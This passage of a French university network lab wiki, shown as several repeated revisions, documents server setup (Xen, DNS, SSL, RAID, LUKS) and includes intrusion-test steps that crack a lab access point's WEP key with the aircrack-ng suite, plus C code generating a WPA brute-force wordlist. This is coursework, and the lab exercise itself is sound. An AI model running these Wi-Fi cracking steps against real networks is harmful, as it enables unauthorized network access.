=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:&lt;br /&gt;
&lt;br /&gt;
 df -h&lt;br /&gt;
&lt;br /&gt;
Nous connaissons ainsi notre Filesystem:&lt;br /&gt;
&lt;br /&gt;
 fdisk /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons fdisk mais nous devons exécuter la commande&lt;br /&gt;
&lt;br /&gt;
 partprobe &lt;br /&gt;
&lt;br /&gt;
Pour re-écrire dans la table de partition.&lt;br /&gt;
&lt;br /&gt;
Nous commençons l'initialisations de notre clé cryptée &lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksFormat  /dev/sdb1&lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksOpen /dev/sdb1 home&lt;br /&gt;
&lt;br /&gt;
Nous pouvons accéder à notre clé depuis &lt;br /&gt;
&lt;br /&gt;
 cd /media/pifou/665....62/&lt;br /&gt;
&lt;br /&gt;
Nous avons créé un fichier test en sudo à la racine.&lt;br /&gt;
 &lt;br /&gt;
 sudo cryptsetup luksClose home &lt;br /&gt;
&lt;br /&gt;
Cette commande permet de fermer notre clé cryptée.&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[https://www.clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54138</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54138"/>
				<updated>2020-11-30T16:31:35Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Sécurisation de serveur DNS par DNSSEC */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.186/28&lt;br /&gt;
 URL : www.clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09 et zabeth30&lt;br /&gt;
&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0 et /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
3. enable&lt;br /&gt;
&lt;br /&gt;
4. conf t&lt;br /&gt;
&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
&lt;br /&gt;
6. exit&lt;br /&gt;
&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
modif /etc/ssh/sshd_config :&lt;br /&gt;
&lt;br /&gt;
 Changement port : PORT 2222&lt;br /&gt;
 Login depuis root : PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
service ssh restart&lt;br /&gt;
&lt;br /&gt;
on peut donc :&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
                               8         ; Serial&lt;br /&gt;
                          604800         ; Refresh&lt;br /&gt;
                           86400         ; Retry&lt;br /&gt;
                         2419200         ; Expire&lt;br /&gt;
                          604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.clavaire.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      100 clavaire.site.&lt;br /&gt;
 ns1     IN      A       193.48.57.186&lt;br /&gt;
 www     IN      A       193.48.57.186&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
- pour vérifier :&lt;br /&gt;
 host -tany clavaire.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation site web par certificat ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé un serveur apache2,&lt;br /&gt;
&lt;br /&gt;
 systemctl start apache2&lt;br /&gt;
&lt;br /&gt;
Nous avons ajouté à la liste des ports, le module ssl en écoute sur le port 443&lt;br /&gt;
&lt;br /&gt;
Ajout du certificat SSL&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous avons installé openssl puis nous avons créé une nouvelle clé &lt;br /&gt;
&lt;br /&gt;
 La commande est disponible par mail: simoninrichard@gmail.com&lt;br /&gt;
 &lt;br /&gt;
Nous avons deplacé la clé dans private puis nous avons donné la clé public à Gandi pour générer le fichier&lt;br /&gt;
&lt;br /&gt;
Pour la sécurisation SSl, nous avons utilisé le un serveur mail sur notre VM, mailx.&lt;br /&gt;
&lt;br /&gt;
Pour notre serveur mail, nous avons configuré un chemin de sauvegarde de mail Maildir/, qui ne correspond pas au chemin courant.&lt;br /&gt;
&lt;br /&gt;
 mailx -f Maildir/&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi ajouté un alias afin de recéptionner les mails en admin et non en root.&lt;br /&gt;
&lt;br /&gt;
A l'aide du serveur mail, nous avons pu valider les différentes etapes de validation SSL&lt;br /&gt;
&lt;br /&gt;
Nous devons ensuite activer nos certificats SSL&lt;br /&gt;
&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
Ensuite nous avons modifié notre fichier de conf de notre site: clavaire.site.conf, pour ajouté nos chemins de fichiers de certificat SSL.&lt;br /&gt;
&lt;br /&gt;
Puis un petit restart et notre site est sécurisé.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
Nous avons suivi les différentes étapes du sujet de TP. Nous avons choisis comme nom de zone: clavaire.site.&lt;br /&gt;
&lt;br /&gt;
Nous avons vérifié le bon fonctionnement à l'aide de :&lt;br /&gt;
&lt;br /&gt;
 https://dnsviz.net/d/clavaire.site/dnssec/&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Code c pour générer le dictionnaire :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     FILE *f;&lt;br /&gt;
     f = fopen(&amp;quot;fichierbruteforce.txt&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;
     if(f==NULL){&lt;br /&gt;
         printf(&amp;quot;Erreur lors de l'ouverture c'un fichier&amp;quot;);&lt;br /&gt;
         exit(1);&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     for(char a=0; a&amp;lt;10;a++)&lt;br /&gt;
     {&lt;br /&gt;
         for(char z=0; z&amp;lt;10;z++)&lt;br /&gt;
         {&lt;br /&gt;
             for(char e=0; e&amp;lt;10;e++)&lt;br /&gt;
             {&lt;br /&gt;
                 for(char r=0; r&amp;lt;10;r++)&lt;br /&gt;
                 {&lt;br /&gt;
                     for(char t=0; t&amp;lt;10;t++)&lt;br /&gt;
                     {&lt;br /&gt;
                         for(char y=0; y&amp;lt;10;y++)&lt;br /&gt;
                         {&lt;br /&gt;
                             for(char u=0; u&amp;lt;10;u++)&lt;br /&gt;
                             {&lt;br /&gt;
                                 for(char i=0; i&amp;lt;10;i++)&lt;br /&gt;
                                 {&lt;br /&gt;
                                     //printf(&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                     fprintf(f,&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                 }&lt;br /&gt;
                             }&lt;br /&gt;
                         }&lt;br /&gt;
                     }&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
     fclose(f);&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP === &lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Réalisations ==&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
&lt;br /&gt;
On crée 3 disques virtuel de 1G (lvcreate -L1G -nclavaire-raid1 storage) et on les ajoute au fichier de config.&lt;br /&gt;
On peut créer le raid :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Pour qu'il soit monté a chaque démarrage de la vm : &lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
Et on l'ajoute au fichier /etc/fstab&lt;br /&gt;
&lt;br /&gt;
Avec des fichiers dans le ce volume, meme si un disque est déconnecté, les données sont toujours disponible.&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:&lt;br /&gt;
&lt;br /&gt;
 df -h&lt;br /&gt;
&lt;br /&gt;
Nous connaissons ainsi notre Filesystem:&lt;br /&gt;
&lt;br /&gt;
 fdisk /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons fdisk mais nous devons exécuter la commande&lt;br /&gt;
&lt;br /&gt;
 partprobe &lt;br /&gt;
&lt;br /&gt;
Pour re-écrire dans la table de partition.&lt;br /&gt;
&lt;br /&gt;
Nous commençons l'initialisations de notre clé cryptée &lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksFormat  /dev/sdb1&lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksOpen /dev/sdb1 home&lt;br /&gt;
&lt;br /&gt;
Nous pouvons accéder à notre clé depuis &lt;br /&gt;
&lt;br /&gt;
 cd /media/pifou/665....62/&lt;br /&gt;
&lt;br /&gt;
Nous avons créé un fichier test en sudo à la racine.&lt;br /&gt;
 &lt;br /&gt;
 sudo cryptsetup luksClose home &lt;br /&gt;
&lt;br /&gt;
Cette commande permet de fermer notre clé cryptée.&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[https://www.clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54129</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54129"/>
				<updated>2020-11-30T16:25:41Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Sécurisation site web par certificat */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.186/28&lt;br /&gt;
 URL : www.clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09 et zabeth30&lt;br /&gt;
&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0 et /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
3. enable&lt;br /&gt;
&lt;br /&gt;
4. conf t&lt;br /&gt;
&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
&lt;br /&gt;
6. exit&lt;br /&gt;
&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
modif /etc/ssh/sshd_config :&lt;br /&gt;
&lt;br /&gt;
 Changement port : PORT 2222&lt;br /&gt;
 Login depuis root : PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
service ssh restart&lt;br /&gt;
&lt;br /&gt;
on peut donc :&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
                               8         ; Serial&lt;br /&gt;
                          604800         ; Refresh&lt;br /&gt;
                           86400         ; Retry&lt;br /&gt;
                         2419200         ; Expire&lt;br /&gt;
                          604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.clavaire.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      100 clavaire.site.&lt;br /&gt;
 ns1     IN      A       193.48.57.186&lt;br /&gt;
 www     IN      A       193.48.57.186&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
- pour vérifier :&lt;br /&gt;
 host -tany clavaire.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation site web par certificat ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé un serveur apache2,&lt;br /&gt;
&lt;br /&gt;
 systemctl start apache2&lt;br /&gt;
&lt;br /&gt;
Nous avons ajouté à la liste des ports, le module ssl en écoute sur le port 443&lt;br /&gt;
&lt;br /&gt;
Ajout du certificat SSL&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous avons installé openssl puis nous avons créé une nouvelle clé &lt;br /&gt;
&lt;br /&gt;
 La commande est disponible par mail: simoninrichard@gmail.com&lt;br /&gt;
 &lt;br /&gt;
Nous avons deplacé la clé dans private puis nous avons donné la clé public à Gandi pour générer le fichier&lt;br /&gt;
&lt;br /&gt;
Pour la sécurisation SSl, nous avons utilisé le un serveur mail sur notre VM, mailx.&lt;br /&gt;
&lt;br /&gt;
Pour notre serveur mail, nous avons configuré un chemin de sauvegarde de mail Maildir/, qui ne correspond pas au chemin courant.&lt;br /&gt;
&lt;br /&gt;
 mailx -f Maildir/&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi ajouté un alias afin de recéptionner les mails en admin et non en root.&lt;br /&gt;
&lt;br /&gt;
A l'aide du serveur mail, nous avons pu valider les différentes etapes de validation SSL&lt;br /&gt;
&lt;br /&gt;
Nous devons ensuite activer nos certificats SSL&lt;br /&gt;
&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
Ensuite nous avons modifié notre fichier de conf de notre site: clavaire.site.conf, pour ajouté nos chemins de fichiers de certificat SSL.&lt;br /&gt;
&lt;br /&gt;
Puis un petit restart et notre site est sécurisé.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Code c pour générer le dictionnaire :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     FILE *f;&lt;br /&gt;
     f = fopen(&amp;quot;fichierbruteforce.txt&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;
     if(f==NULL){&lt;br /&gt;
         printf(&amp;quot;Erreur lors de l'ouverture c'un fichier&amp;quot;);&lt;br /&gt;
         exit(1);&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     for(char a=0; a&amp;lt;10;a++)&lt;br /&gt;
     {&lt;br /&gt;
         for(char z=0; z&amp;lt;10;z++)&lt;br /&gt;
         {&lt;br /&gt;
             for(char e=0; e&amp;lt;10;e++)&lt;br /&gt;
             {&lt;br /&gt;
                 for(char r=0; r&amp;lt;10;r++)&lt;br /&gt;
                 {&lt;br /&gt;
                     for(char t=0; t&amp;lt;10;t++)&lt;br /&gt;
                     {&lt;br /&gt;
                         for(char y=0; y&amp;lt;10;y++)&lt;br /&gt;
                         {&lt;br /&gt;
                             for(char u=0; u&amp;lt;10;u++)&lt;br /&gt;
                             {&lt;br /&gt;
                                 for(char i=0; i&amp;lt;10;i++)&lt;br /&gt;
                                 {&lt;br /&gt;
                                     //printf(&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                     fprintf(f,&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                 }&lt;br /&gt;
                             }&lt;br /&gt;
                         }&lt;br /&gt;
                     }&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
     fclose(f);&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP === &lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Réalisations ==&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
&lt;br /&gt;
On crée 3 disques virtuel de 1G (lvcreate -L1G -nclavaire-raid1 storage) et on les ajoute au fichier de config.&lt;br /&gt;
On peut créer le raid :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Pour qu'il soit monté a chaque démarrage de la vm : &lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
Et on l'ajoute au fichier /etc/fstab&lt;br /&gt;
&lt;br /&gt;
Avec des fichiers dans le ce volume, meme si un disque est déconnecté, les données sont toujours disponible.&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:&lt;br /&gt;
&lt;br /&gt;
 df -h&lt;br /&gt;
&lt;br /&gt;
Nous connaissons ainsi notre Filesystem:&lt;br /&gt;
&lt;br /&gt;
 fdisk /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons fdisk mais nous devons exécuter la commande&lt;br /&gt;
&lt;br /&gt;
 partprobe &lt;br /&gt;
&lt;br /&gt;
Pour re-écrire dans la table de partition.&lt;br /&gt;
&lt;br /&gt;
Nous commençons l'initialisations de notre clé cryptée &lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksFormat  /dev/sdb1&lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksOpen /dev/sdb1 home&lt;br /&gt;
&lt;br /&gt;
Nous pouvons accéder à notre clé depuis &lt;br /&gt;
&lt;br /&gt;
 cd /media/pifou/665....62/&lt;br /&gt;
&lt;br /&gt;
Nous avons créé un fichier test en sudo à la racine.&lt;br /&gt;
 &lt;br /&gt;
 sudo cryptsetup luksClose home &lt;br /&gt;
&lt;br /&gt;
Cette commande permet de fermer notre clé cryptée.&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
